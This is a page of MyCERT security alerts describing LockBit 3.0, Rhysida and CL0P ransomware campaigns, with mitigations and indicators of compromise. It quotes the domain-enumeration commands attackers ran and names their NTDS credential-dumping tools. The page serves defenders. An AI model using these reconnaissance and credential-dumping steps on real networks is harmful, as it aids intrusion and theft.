MA-993.112023: MyCERT Alert - Cyber Security Best Practices against Ransomware LockBit 3.0

  • 29 Nov 2023
  • Alert
  • lockbit, ransomware

1.0 Introduction

The Cyber999 Incident Response Centre observed an increase in various ransomware-related attacks, including attacks executed by well-identified ransomware known as LockBit 3.0. Lately, we have been receiving incidents involving a number of organisations in Malaysia hit by the LockBit 3.0 ransomware. Hence, this advisory is released to alert and advise organisations to apply necessary measures on prevention and mitigations if they are targeted or fall victim.

LockBit 3.0 operates as an affiliate-based Ransomware-as-a-Service (RaaS) and employs a wide variety of tactics, techniques, and procedures (TTP), creating significant challenges for defence and mitigation. LockBit 3.0 ransomware compromises victim networks through a variety of techniques, including, but not limited to, purchased access, unpatched vulnerabilities, insider access, and zero-day exploits. The attackers associated with the Lockbit 3.0 are believed to originate from Russia. According to a detailed analysis, the ransomware checks the default system language, avoids encryption and stops the attack if the victim system’s language is Russian or one of the countries nearby Russia.

We have previously released an advisory on Lockbit 3.0 ransomware, available at:

https://www.mycert.org.my/portal/advisory?id=MA-907.012023

Additionally, it was also reported recently by security researchers and security organisations that the infamous LockBit 3.0 ransomware group was observed exploiting a critical unpatched Citrix NetScaler ADC and NetScaler Gateway vulnerability – CVE-2023-4966, referred to as "Citrix Bleed," increasing the urgency for enterprises to patch. Citrix Bleed was disclosed on October 10 2023, as a critical security issue that affects Citrix NetScaler ADC and Gateway, enabling unauthorised access to sensitive device information. 

A joint advisory by CISA, FBI, MS-ISAC, and ASD’s ACSC was released on LockBit affiliates exploiting Citrix Bleed, available at:

https://www.cisa.gov/news-events/alerts/2023/11/21/cisa-fbi-ms-isac-and-asds-acsc-release-advisory-lockbit-affiliates-exploiting-citrix-bleed

2.0 Impact
The impacts of LockBit 3.0 are:

  • Operations disruption with essential functions coming to a sudden halt.
  • Extortion by the hackers for financial gain.
  • Data theft and illegal publication as blackmail if the victim does not comply. 

3.0 Recommendations
MyCERT recommends network defenders apply the following mitigations to reduce the risk of compromise by LockBit 3.0 ransomware:

1) Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to have strong, unique passwords. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access. 

Note: Devices with local administrative accounts should implement a password policy requiring strong, unique passwords for each administrative account.

2) Require multi-factor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.

3) Keep all operating systems and software up to date. Prioritize patching known exploited vulnerabilities. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.

4) Apply security updates released by Citrix to address CVE-2023-4966 in NetScaler ADC and NetScaler Gateway.

https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967

5) Remove unnecessary access to administrative shares, especially ADMIN$ and C$. If ADMIN$ and C$ are deemed operationally necessary, and these restrict privileges to only the necessary service or user accounts and perform continuous monitoring for anomalous activity.

6) Use a host-based firewall to only allow connections to administrative shares via server message block (SMB) from a limited set of administrator machines.

7) Enable protected files in the Windows Operating System to prevent unauthorized changes to critical files.

8) Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.

9) Maintain offline backups of data and regularly maintain backup and restoration. By implementing this practice, the organisation ensures they will not be severely interrupted, and/or only have irretrievable data.
 

Generally, MyCERT advises the users of these devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours)  
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

6.0    References

MA-989.112023: MyCERT Alert - CISA, FBI, and MS-ISAC Release Advisory on Rhysida Ransomware

  • 21 Nov 2023
  • Alert
  • rhysida, ransomware

1.0 Introduction

Recently, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint Cybersecurity Advisory (CSA), #StopRansomware: Rhysida Ransomware, to disseminate known Rhysida ransomware indicators of compromise (IOCs), detection methods, and tactics, techniques, and procedures (TTPs) identified through investigations as recently as September 2023.

Observed as a ransomware-as-a-service (RaaS) model, Rhysida actors have compromised organizations in education, manufacturing, information technology, and government sectors and any ransom paid is split between the group and affiliates. Rhysida actors leverage external-facing remote services, such as virtual private networks (VPNs), Zerologon vulnerability (CVE-2020-1472), and phishing campaigns to gain initial access and persistence within a network.

2.0 Impact
Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. Open source reporting details similarities between Vice Society (DEV-0832)[1] activity and the actors observed deploying Rhysida ransomware. Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model. Any ransoms paid are then split between the group and the affiliates.

For additional information on Vice Society actors and associated activity, see the joint CSA #StopRansomware: Vice Society.

3.0 Technical Details

3.1 Tactics, Techniques and Procedures (TTPs)
3.1.1 Initial Access

Rhysida actors have been observed leveraging external-facing remote services to initially access and persist within a network. Remote services, such as virtual private networks (VPNs), allow users to connect to internal enterprise network resources from external locations. Rhysida actors have commonly been observed authenticating to internal VPN access points with compromised valid credentials [T1078], notably due to organizations lacking MFA enabled by default. Additionally, actors have been observed exploiting Zerologon (CVE-2020-1472)—a critical elevation of privileges vulnerability in Microsoft’s Netlogon Remote Protocol [T1190]—as well as conducting successful phishing attempts [T1566]. Note: Microsoft released a patch for CVE-2020-1472 on August 11, 2020.[3]

3.1.2 Living off the Land

Analysis identified Rhysida actors using living off the land techniques, such as creating Remote Desktop Protocol (RDP) connections for lateral movement [T1021.001], establishing VPN access, and utilizing PowerShell [T1059.001]. Living off the land techniques include using native (built into the operating system) network administration tools to perform operations. This allows the actors to evade detection by blending in with normal Windows systems and network activities.

Ipconfig [T1016], whoami [T1033], nltest [T1482], and several net commands have been used to enumerate victim environments and gather information about domains. In one instance of using compromised credentials, actors leveraged net commands within PowerShell to identify logged-in users and performed reconnaissance on network accounts within the victim environment. Note: The following commands were not performed in the exact order listed.

  • net user [username] /domain [T1087.002]
  • net group “domain computers” /domain [T1018]
  • net group “domain admins” /domain [T1069.002]
  • net localgroup administrators [T1069.001]

Analysis of the master file table (MFT)[4] identified the victim system generated the ntuser.dat registry hive, which was created when the compromised user logged in to the system for the first time. This was considered anomalous due to the baseline of normal activity for that particular user and system. Note: The MFT resides within the New Technology File System (NTFS) and houses information about a file including its size, time and date stamps, permissions, and data content.

3.1.3 Leveraged Tools

Table 1 lists legitimate tools Rhysida actors have repurposed for their operations. The legitimate tools listed in this joint CSA are all publicly available. Use of these tools should not be attributed as malicious without analytical evidence to support they are used at the direction of or controlled by threat actors.

Disclaimer: Organizations are encouraged to investigate and vet use of these tools prior to performing remediation actions.

NameDescription
cmd.exeThe native command line prompt utility.
PowerShell.exeA native command line tool used to start a Windows PowerShell session in a Command Prompt window.
PsExec.exeA tool included in the PsTools suite used to execute processes remotely. Rhysida actors heavily leveraged this tool for lateral movement and remote execution.
mstsc.exeA native tool that establishes an RDP connection to a host.
PuTTY.exeRhysida actors have been observed creating Secure Shell (SSH) PuTTy connections for lateral movement. In one example, analysis of PowerShell console host history for a compromised user account revealed Rhysida actors leveraged PuTTy to remotely connect to systems via SSH [T1021.004].
PortStarterA back door script written in Go that provides functionality for modifying firewall settings and opening ports to pre-configured command and control (C2) servers.[1]
secretsdumpA script used to extract credentials and other confidential information from a system. Rhysida actors have been observed using this for NTDS dumping [T1003.003] in various instances.
ntdsutil.exe

A standard Windows tool used to interact with the NTDS database. Rhysida actors used this tool to extract and dump the NTDS.dit database from the domain controller containing hashes for all Active Directory (AD) users.

Note: It is strongly recommended that organizations conduct domain-wide password resets and double Kerberos TGT password resets if any indication is found that the NTDS.dit file was compromised.

AnyDeskA common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer.
wevtutil.exeA standard Windows Event Utility tool used to view event logs. Rhysida actors used this tool to clear a significant number of Windows event logs, including system, application, and security logs [T1070.001].
PowerViewA PowerShell tool used to gain situational awareness of Windows domains. Review of PowerShell event logs identified Rhysida actors using this tool to conduct additional reconnaissance-based commands and harvest credentials.

3.2 Rhysida Ransomware Characteristics

3.2.1 Execution

In one investigation, Rhysida actors created two folders in the C:\ drive labeled in and out, which served as a staging directory (central location) for hosting malicious executables. The in folder contained file names in accordance with host names on the victim’s network, likely imported through a scanning tool. The out folder contained various files listed in Table 2 below. Rhysida actors deployed these tools and scripts to assist system and network-wide encryption.

File NameHash (SHA256)Description
conhost.exe6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010A ransomware binary.
psexec.exe078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937bA file used to execute a process on a remote or local host.
S_0.bat1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597A batch script likely used to place 1.ps1 on victim systems for ransomware staging purposes [T1059.003].
1.ps14e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183Identifies an extension block list of files to encrypt and not encrypt.
S_1.bat97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4A batch script that copies conhost.exe (the encryption binary) on an imported list of host names within the C:\Windows\Temp directory of each system.
S_2.bat918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1Executes conhost.exe on compromised victim systems, which encrypts and appends the extension of .Rhysida across the environment.

Rhysida ransomware uses a Windows 64-bit Portable Executable (PE) or common object file format (COFF) compiled using MinGW via the GNU Compiler Collection (GCC), which supports various programming languages such as C, C++, and Go. The cryptographic ransomware application first injects the PE into running processes on the compromised system [T1055.002]. Additionally, third-party researchers identified evidence of Rhysida actors developing custom tools with program names set to “Rhysida-0.1” [T1587].

3.2.2 Encryption

After mapping the network, the ransomware encrypts data using a 4096-bit RSA encryption key with a ChaCha20 algorithm [T1486]. The algorithm features a 256-bit key, a 32-bit counter, and a 96-bit nonce along with a four-by-four matrix of 32-bit words in plain text. Registry modification commands [T1112] are not obfuscated, displayed as plain-text strings and executed via cmd.exe.

Rhysida’s encryptor runs a file to encrypt and modify all encrypted files to display a .rhysida extension.[5] Following encryption, a PowerShell command deletes the binary [T1070.004] from the network using a hidden command window [T1564.003]. The Rhysida encryptor allows arguments -d (select a directory) and -sr (file deletion), defined by the authors of the code as parseOptions.[6] After the lines of binary strings complete their tasks, they delete themselves through the control panel to evade detection.

3.2.3 Data Extortion

Rhysida actors reportedly engage in “double extortion” [T1657]—demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.[5],[7] Rhysida actors direct victims to send ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. As shown in Figure 1, Rhysida ransomware drops a ransom note named “CriticalBreachDetected” as a PDF file—the note provides each company with a unique code and instructions to contact the group via a Tor-based portal.

Figure 1: Rhysida Ransom Note

Figure 1: Rhysida Ransom Note

Identified in analysis and also listed in open source reporting, the contents of the ransom note are embedded as plain-text in the ransom binary, offering network defenders an opportunity to deploy string-based detection for alerting on evidence of the ransom note. Rhysida threat actors may target systems that do not use command-line operating systems. The format of the PDF ransom notes could indicate that Rhysida actors only target systems that are compatible with handling PDF documents.[8]

3.3 Indicators of Compromise (IOCs)

On November 10, 2023, Sophos published TTPs and IOCs identified from analysis conducted for six separate incidents.[9] The C2 IP addresses listed in Table 3 were derived directly from Sophos’ investigations and are listed on GitHub among other indicators.[10]

C2 IP Address
5.39.222[.]67
5.255.99[.]59
51.77.102[.]106
108.62.118[.]136
108.62.141[.]161
146.70.104[.]249
156.96.62[.]58
157.154.194[.]6

Additional IOCs were obtained from FBI, CISA, and the MS-ISAC’s investigations and analysis. The email addresses listed in Table 4 are associated with Rhysida actors’ operations. Rhysida actors have been observed creating Onion Mail email accounts for services or victim communication, commonly in the format: [First Name][Last Name]@onionmail[.]org.

Email Address
rhysidaeverywhere@onionmail[.]org
rhysidaofficial@onionmail[.]org

Rhysida actors have also been observed using the following files and executables listed in Table 5 to support their operations.

Disclaimer: Organizations are encouraged to investigate the use of these files for related signs of compromise prior to performing remediation actions.

File NameHash (SHA256)
Sock5.sh48f559e00c472d9ffe3965ab92c6d298f8fb3a3f0d6d203cd2069bfca4bf3a57
PsExec64.exeedfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef
PsExec.exe078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b
PsGetsid64.exe201d8e77ccc2575d910d47042a986480b1da28cf0033e7ee726ad9d45ccf4daa
PsGetsid.exea48ac157609888471bf8578fb8b2aef6b0068f7e0742fccf2e0e288b0b2cfdfb
PsInfo64.exede73b73eeb156f877de61f4a6975d06759292ed69f31aaf06c9811f3311e03e7
PsInfo.exe951b1b5fd5cb13cde159cebc7c60465587e2061363d1d8847ab78b6c4fba7501
PsLoggedon64.exefdadb6e15c52c41a31e3c22659dd490d5b616e017d1b1aa6070008ce09ed27ea
PsLoggedon.exed689cb1dbd2e4c06cd15e51a6871c406c595790ddcdcd7dc8d0401c7183720ef
PsService64.exe554f523914cdbaed8b17527170502199c185bd69a41c81102c50dbb0e5e5a78d
PsService.exed3a816fe5d545a80e4639b34b90d92d1039eb71ef59e6e81b3c0e043a45b751c
Eula.txt8329bcbadc7f81539a4969ca13f0be5b8eb7652b912324a1926fc9bfb6ec005a
psfile64.exebe922312978a53c92a49fefd2c9f9cc098767b36f0e4d2e829d24725df65bc21
psfile.exe4243dc8b991f5f8b3c0f233ca2110a1e03a1d716c3f51e88faf1d59b8242d329
pskill64.exe7ba47558c99e18c2c6449be804b5e765c48d3a70ceaa04c1e0fae67ff1d7178d
pskill.exe5ef168f83b55d2cbd2426afc5e6fa8161270fa6a2a312831332dc472c95dfa42
pslist64.exed3247f03dcd7b9335344ebba76a0b92370f32f1cb0e480c734da52db2bd8df60
pslist.exeed05f5d462767b3986583188000143f0eb24f7d89605523a28950e72e6b9039a
psloglist64.exe5e55b4caf47a248a10abd009617684e969dbe5c448d087ee8178262aaab68636
psloglist.exedcdb9bd39b6014434190a9949dedf633726fdb470e95cc47cdaa47c1964b969f
pspasswd64.exe8d950068f46a04e77ad6637c680cccf5d703a1828fbd6bdca513268af4f2170f
pspasswd.exe6ed5d50cf9d07db73eaa92c5405f6b1bf670028c602c605dfa7d4fcb80ef0801
psping64.exed1f718d219930e57794bdadf9dda61406294b0759038cef282f7544b44b92285
psping.exe355b4a82313074999bd8fa1332b1ed00034e63bd2a0d0367e2622f35d75cf140
psshutdown64.exe4226738489c2a67852d51dbf96574f33e44e509bc265b950d495da79bb457400
psshutdown.exe13fd3ad690c73cf0ad26c6716d4e9d1581b47c22fb7518b1d3bf9cfb8f9e9123
pssuspend64.exe4bf8fbb7db583e1aacbf36c5f740d012c8321f221066cc68107031bd8b6bc1ee
pssuspend.exe95a922e178075fb771066db4ab1bd70c7016f794709d514ab1c7f11500f016cd
PSTools.zipa9ca77dfe03ce15004157727bb43ba66f00ceb215362c9b3d199f000edaa8d61
Pstools.chm2813b6c07d17d25670163e0f66453b42d2f157bf2e42007806ebc6bb9d114acc
psversion.txt8e43d1ddbd5c129055528a93f1e3fab0ecdf73a8a7ba9713dc4c3e216d7e5db4
psexesvc.exeThis artifact is created when a user establishes a connection using psexec. It is removed after the connection is terminated, which is why there is no hash available for this executable.

 

4.0 Recommendations
MyCERT recommends system administrators to review this advisory and take the below recommended mitigations to reduce the likelihood and impact of Rhysida and other ransomware incidents. 

  1. Prioritize remediating known exploited vulnerabilities.
  2. Enable multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, VPN, and accounts that access critical systems.
  3. Segment networks to prevent the spread of ransomware.

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours)  
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

5.0    References

  1. Microsoft: DEV-0832 (Vice Society) Opportunistic Ransomware Campaigns Impacting US Education Sector
  2. FortiGuard Labs: Ransomware Roundup - Rhysida
  3. Microsoft: Security Update Guide - CVE-2020-1472
  4. Microsoft: Master File Table (Local File Systems)
  5. SentinelOne: Rhysida
  6. Secplicity: Scratching the Surface of Rhysida Ransomware
  7. Cisco Talos: What Cisco Talos Knows about the Rhysida Ransomware
  8. SOC Radar: Rhysida Ransomware Threat Profile
  9. Sophos: A Threat Cluster’s Switch from Vice Society to Rhysida
  10. Sophos: Vice Society - Rhysida IOCs (GitHub)
  11. Check Point Research: Rhysida Ransomware - Activity and Ties to Vice Society
  12. Microsoft: Command Line Process Auditing
  13. Microsoft: Audit Process Tracking
  14. Microsoft: Remote Credential Guard
  15. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a

MA-944.062023: MyCERT Advisory - CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability

  • 15 Jun 2023
  • Advisory
  • cl0p, ransomware, moveit, vulnerability

1.0 Introduction

Open-source data indicates that on May 27, 2023, the CL0P Ransomware Gang, also known as TA505, started exploiting a previously unreported SQL injection vulnerability (CVE-2023-34362) in Progress Software’s managed file transfer (MFT), MOVEit Transfer. 

A web shell called LEMURLOOT was used to infect MOVEit Transfer web apps that were accessible to the public and steal data from the underlying MOVEit Transfer databases. Similar flurry of activity was launched by TA505 in early 2023 targeting Fortra/Linoma GoAnywhere MFT servers and Accellion File Transfer Appliance (FTA) devices in the form of zero-day exploit-driven attacks.

 

2.0 Impact

  • Retrieve Microsoft Azure system settings and enumerate the underlying SQL database.
  • Store a string sent by the operator and then retrieve a file with a name matching the string from the MOVEit Transfer system.
  • Create a new administrator privileged account with a randomly generated username and LoginName and RealName values set to “Health Check Service.”
  • Delete an account with LoginName and RealName values set to ‘Health Check Service.’

 

3.0 Affected Products

  • MOVEit Transfer 2023.0.0
  • MOVEit Transfer 2022.1.x
  • MOVEit Transfer 2022.0.x
  • MOVEit Transfer 2021.1.x
  • MOVEit Transfer 2021.0.x
  • MOVEit Transfer 2020.1.x
  • MOVEit Transfer 2020.0.x

 

4.0 Indicators of Compromise (IoCs)
4.1 Moveit Campaign Indicators of Compromised

FilesHash

LEMURLOOT

Web Shell

e.g. human2.aspx

 0b3220b11698b1436d1d866ac07cc90018e59884e91a8cb71ef8924309f1e0e9 
0ea05169d111415903a1098110c34cdbbd390c23016cd4e179dd9ef507104495 
110e301d3b5019177728010202c8096824829c0b11bb0dc0bff55547ead18286 
1826268249e1ea58275328102a5a8d158d36b4fd312009e4a2526f0bfbc30de2 
2413b5d0750c23b07999ec33a5b4930be224b661aaf290a0118db803f31acbc5 
2ccf7e42afd3f6bf845865c74b2e01e2046e541bb633d037b05bd1cdb296fa59 
348e435196dd795e1ec31169bd111c7ec964e5a6ab525a562b17f10de0ab031d 
387cee566aedbafa8c114ed1c6b98d8b9b65e9f178cf2f6ae2f5ac441082747a 
38e69f4a6d2e81f28ed2dc6df0daf31e73ea365bd2cfc90ebc31441404cca264 
3a977446ed70b02864ef8cfa3135d8b134c93ef868a4cc0aa5d3c2a74545725b 
3ab73ea9aebf271e5f3ed701286701d0be688bf7ad4fb276cb4fbe35c8af8409 
3c0dbda8a5500367c22ca224919bfc87d725d890756222c8066933286f26494c 
4359aead416b1b2df8ad9e53c497806403a2253b7e13c03317fc08ad3b0b95bf 
48367d94ccb4411f15d7ef9c455c92125f3ad812f2363c4d2e949ce1b615429a 
58ccfb603cdc4d305fddd52b84ad3f58ff554f1af4d7ef164007cb8438976166 
5b566de1aa4b2f79f579cdac6283b33e98fdc8c1cfa6211a787f8156848d67ff 
6015fed13c5510bbb89b0a5302c8b95a5b811982ff6de9930725c4630ec4011d 
702421bcee1785d93271d311f0203da34cc936317e299575b06503945a6ea1e0 
769f77aace5eed4717c7d3142989b53bd5bac9297a6e11b2c588c3989b397e6b 
7c39499dd3b0b283b242f7b7996205a9b3cf8bd5c943ef6766992204d46ec5f1 
93137272f3654d56b9ce63bec2e40dd816c82fb6bad9985bed477f17999a47db 
98a30c7251cf622bd4abce92ab527c3f233b817a57519c2dd2bf8e3d3ccb7db8 
9d1723777de67bc7e11678db800d2a32de3bcd6c40a629cd165e3f7bbace8ead 
9e89d9f045664996067a05610ea2b0ad4f7f502f73d84321fb07861348fdc24a 
a1269294254e958e0e58fc0fe887ebbc4201d5c266557f09c3f37542bd6d53d7 
a8f6c1ccba662a908ef7b0cb3cc59c2d1c9e2cbbe1866937da81c4c616e68986 
b1c299a9fe6076f370178de7b808f36135df16c4e438ef6453a39565ff2ec272 
b5ef11d04604c9145e4fe1bedaeb52f2c2345703d52115a5bf11ea56d7fb6b03 
b9a0baf82feb08e42fa6ca53e9ec379e79fbe8362a7dac6150eb39c2d33d94ad 
bdd4fa8e97e5e6eaaac8d6178f1cf4c324b9c59fc276fd6b368e811b327ccf8b 
c56bcb513248885673645ff1df44d3661a75cfacdce485535da898aa9ba320d4 
c77438e8657518221613fbce451c664a75f05beea2184a3ae67f30ea71d34f37 
cec425b3383890b63f5022054c396f6d510fae436041add935cd6ce42033f621 
cf23ea0d63b4c4c348865cefd70c35727ea8c82ba86d56635e488d816e60ea45 
d477ec94e522b8d741f46b2c00291da05c72d21c359244ccb1c211c12b635899 
d49cf23d83b2743c573ba383bf6f3c28da41ac5f745cde41ef8cd1344528c195 
daaa102d82550f97642887514093c98ccd51735e025995c2cc14718330a856f4 
e8012a15b6f6b404a33f293205b602ece486d01337b8b3ec331cd99ccadb562e 
ea433739fb708f5d25c937925e499c8d2228bf245653ee89a6f3d26a5fd00b7a 
ed0c3e75b7ac2587a5892ca951707b4e0dd9c8b18aaf8590c24720d73aa6b90c 
f0d85b65b9f6942c75271209138ab24a73da29a06bc6cc4faeddcb825058c09d 
fe5f8388ccea7c548d587d1e2843921c038a9f4ddad3cb03f3aa8a45c29c6a2f 

 

4.2 GoAnywhere Campaign Indicators of Compromise

FilesHashDescription
larabqFa.exe Qboxdv.dll

0e3a14638456f4451fe8d76

fdc04e591fba942c2f16da3 1857ca66293a58a4c3

Truebot
%TMP%\7ZipSfx.000\Zoom.exe1285aa7e6ee729be808c46 c069e30a9ee9ce34287151 076ba81a0bea0508ff7eSpawns a PowerShell subprocess which executes a malicious DLL file
%TMP%\7ZipSfx.000\ANetDiag.dll2c8d58f439c708c28ac4ad 4a0e9f93046cf076fc6e5ab 1088e8943c0909acbc4

Obfuscated malware which also uses long sleeps and

debug detection to evade analysis

AVICaptures.dll

a8569c78af187d603eecdc 5faec860458919349eef510

91893b705f466340ecd

Truebot
kpdphhajHbFerUr.exe gamft.dll

c042ad2947caf4449295a5

1f9d640d722b5a6ec69575 23ebf68cddb87ef3545c

Truebot
dnSjujahur.exe Pxaz.dll

c9b874d54c18e895face05 5eeb6faa2da7965a336d70

303d0bd6047bec27a29d

Truebot
7ZSfxMod_x86.exe ZoomInstaller.exe Zoom.exed5bbcaa0c3eeea17f12a5c c3dbcaffff423d00562acb69 4561841bcfe984a3b7Fake Zoom installer - Truebot
update.jsp

eb9f5cbe71f9658d38fb4a7

aa101ad40534c4c93ee73e f5f6886d89159b0e2c2

Java Server Pages (JSP) web

shell with some base64 obfuscation

%TMP%\<folder>\extracted_at_0x e5c8f00.exef2f08e4f108aaffaadc3d11b ad24abdd625a77e0ee9674 c4541b562c78415765

Employs sandbox detection and string obfuscation - appears to be a collection of

C# hack tools

UhfdkUSwkFKedUUi.exe gamft.dllff8c8c8bfba5f2ba2f800325 5949678df209dbff95e16f2f 3c338cfa0fd1b885Truebot

 

Email AddressDescription
unlock@rsv-box[.]comCL0P communication email
unlock@support-mult[.]comCL0P communication email
rey14000707@gmail[.]comLogin/Download
gagnondani225@gmail[.]comEmail

 

Malicious Domain
http://hiperfdhaus[.]com
http://jirostrogud[.]com
http://qweastradoc[.]com
http://qweastradoc[.]com/gate.php
http://connectzoomdownload[.]com/download/ZoomInstaller.exe
https://connectzoomdownload[.]com/download/ZoomInstaller.exe

 

Certificate Name

 

Status

 

Date Valid

 

Thumbprint

Serial Number

 

Savas Investments PTY LTD

Valid Issuer: Sectigo Public Code Signing CA R36

 

10/7/2022 -

10/7/2023

8DCCF6AD21A58226521

00-82-D2-24-

32-3E-FA-65-

06-0B-64- 1F-

51-FA-DF-EF-

02

 

E36D7E5DBAD133331C181

 

MOVEit Campaign Infrastructure IP Addresses

May/June 2023

GoAnywhere Campaign Infrastructure IP Addresses

January/February 2023

104.194.222[.]107100.21.161[.]34
138.197.152[.]201104.200.72[.]149
146.0.77[.]141107.181.161[.]207
146.0.77[.]155141.101.68[.]154
146.0.77[.]183141.101.68[.]166
148.113.152[.]144142.44.212[.]178
162.244.34[.]26143.31.133[.]99
162.244.35[.]6148.113.159[.]146
179.60.150[.]143148.113.159[.]213
185.104.194[.]15615.235.13[.]184
185.104.194[.]2415.235.83[.]73
185.104.194[.]40162.158.129[.]79
185.117.88[.]17166.70.47[.]90
185.162.128[.]75172.71.134[.]76
185.174.100[.]215173.254.236[.]131
185.174.100[.]250185.104.194[.]134
185.181.229[.]240185.117.88[.]2
185.181.229[.]73185.174.100[.]17
185.183.32[.]122185.33.86[.]225
185.185.50[.]172185.33.87[.]126
188.241.58[.]244185.80.52[.]230
193.169.245[.]79185.81.113[.]156
194.33.40[.]103192.42.116[.]191
194.33.40[.]104195.38.8[.]241
194.33.40[.1]64198.137.247[.]10
198.12.76[.]214198.199.74[.]207
198.27.75[.]110198.199.74[.]207:1234/update.jsp
206.221.182[.]106198.245.13[.]4
209.127.116[.]12220.47.120[.]195
209.127.4[.]22208.115.199[.]25
209.222.103[.]170209.222.98[.]25
209.97.137[.]33213.121.182[.]84
45.227.253[.]133216.144.248[.]20
45.227.253[.]14723.237.114[.]154
45.227.253[.]5023.237.56[.]234
45.227.253[.]63.101.53[.]11
45.227.253[.]8244.206.3[.]111
45.56.165[.]24845.182.189[.]200
5.149.248[.]6845.182.189[.]228
5.149.250[.]7445.182.189[.]229
5.149.250[.]925.149.250[.]90
5.188.86[.]1145.149.252[.]51
5.188.86[.]2505.188.206[.]76
5.188.87[.]1945.188.206.76[:]8000/se1.dll
5.188.87[.]2265.34.178[.]27
5.188.87[.]275.34.178[.]28
5.252.23[.]1165.34.178[.]30
5.252.25[.]885.34.178[.]31
5.34.180[.]2055.34.180[.]48
62.112.11[.]5750.7.118[.]90
62.182.82[.]1954.184.187[.]134
62.182.85[.]23454.39.133[.]41
66.85.26[.]21563.143.42[.]242
66.85.26[.]23468.156.159[.]10
66.85.26[.]24874.218.67[.]242
79.141.160[.]7876.117.196[.]3
79.141.160[.]8379.141.160[.]78
84.234.96[.]10479.141.161[.]82
84.234.96[.]3179.141.173[.]94
89.39.104[.]11881.56.49[.]148
89.39.105[.]10882.117.252[.]141
91.202.4[.]7682.117.252[.]142
91.222.174[.]9582.117.252[.]97
91.229.76[.]18788.214.27[.]100
93.190.142[.]13188.214.27[.]101
 91.222.174[.]68
 91.223.227[.]140
 92.118.36[.]210
 92.118.36[.]213
 92.118.36[.]249
 96.10.22[.]178
 96.44.181[.]131
 5.252.23[.]116
 5.252.25[.]88
 84.234.96[.]104
 89.39.105[.]108
 138.197.152[.]201
 148.113.152[.]144
 198.12.76[.]214
 209.97.137[.]33
 209.222.103[.]170

 

5.0 Recommendations
MyCERT recommends users and administrators to follow the security best practices as recommended below to improve their organization’s security posture.

  • Reduce threat of malicious actors using remote access tools by:
    • Auditing remote access tools.
    • Reviewing logs for execution of remote access software.
    • Using security software.
    • Requiring authorized remote access solutions.
    • Blocking both inbound and outbound connections.
  • Implement application controls.
  • Strictly limit the use of RDP and other remote desktop services.
  • Disable command-line and scripting.
  • Restrict the use of PowerShell.
  • Update Windows PowerShell or PowerShell Core.
  • Review domain controllers, servers, workstation, and active directories.
  • Audit user accounts with administrative privileges.
  • Reduce the threat of credential compromise.
  • Implement time-based access for accounts.

In addition, MyCERT recommend apply the following recommendation to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan.
  • Maintain offline backups of data.
  • Require multifactor authentication.
  • Keep all operating systems, software and firmware up to date.
  • Segment networks.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.
  • Install, regularly update, and enable real time detection for antivirus software.
  • Disable unused ports and hyperlinks.
  • Consider adding and email banner to emails.
  • Ensure all backup data is encrypted, immutable.

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

 

6.0    References

MA-941.062023: MyCERT Advisory - BianLian Ransomware Group

  • 15 Jun 2023
  • Advisory
  • bianlian, ransomware,

1.0 Introduction

